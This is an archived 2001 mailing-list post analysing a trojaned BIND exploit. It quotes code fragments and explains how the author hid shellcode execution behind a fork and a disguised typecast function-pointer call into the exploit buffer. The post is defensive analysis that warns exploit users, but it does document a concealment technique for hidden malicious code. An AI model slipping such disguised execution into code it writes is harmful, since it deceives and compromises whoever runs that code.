Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Thu, 1 Feb 2001 01:03:31 -0800
From: Perry Harrington <[email protected]>
To: [email protected]
Subject: offending code of bind trojan

--DocE+STaALJfprDB
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Below I have excerpted the obvious pieces of the trojan.  The functions
which do the deed are set_ptr, and the call to dnsprintflabel.

I just thought some people may have wanted to know how the person who
wrote the trojan hid the shellcode among the seemingly correct exploit.

--Perry

***
*** set_ptr does the fork dance.
***

int
set_ptr(char *buff, int offset, unsigned long val, int s)
{

		if (!fork())

***
*** After the above fork, child does meaningless memcpy and
*** returns to main, causing multiple executions of the trojan
*** shellcode.
***

	memcpy(buff, copy_buff, sizeof(copy_buff));
	return 0;
}

***
*** dnsprintflabel has a lot of crap code in it, but it
*** isn't this function that does the deed, it's the
*** arguments to the function.
***

/* pull out a compressed query name */
char           *
dnsprintflabel(char *s, char *buf, char *p)
{
	return (p);
}


***
*** This is the actual code that does the running of the shellcode.
*** In it he hides a lot of useless casts to hide the inline prototype
*** of the call to the shellcode.
***

	/*
	 * encode packet ...
	 */
	dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
		 (char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                 |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

                 This is the carefully typecasted prototype for the shellcode, he
		 just skips all the header and pointer crap to actually run the
		 shellcode.  The &expl_buffer[0] + sizeof(HEADER) + 1 is actually
		 just the shellcode he copied from the buffers above, hidden behind
		 some custom types and stuff.

		 EXPLANATION: The & dereference just returns the pointer of the array
		 element at the calculated offset (sizeof(HEADER) +1).  The thing that
		 gives this away as a function call is the extra set of parentheses
		 after the typecast, this is the lexicon for an inline function typecast.


--
Perry Harrington                 Director of                   zelur xuniL  ()
[email protected]             System Architecture               Think Blue.  /\

--DocE+STaALJfprDB
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.2 (SunOS)
Comment: For info see http://www.gnupg.org

iD8DBQE6eSZjfK7Bvd0wfuURAjbPAJ0XzUEgf4RITR/RYCLoSt8IZsVTdwCgx4/F
tOTu91/MEnUU6aTQpisfaDg=
=mHlC
-----END PGP SIGNATURE-----

--DocE+STaALJfprDB--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: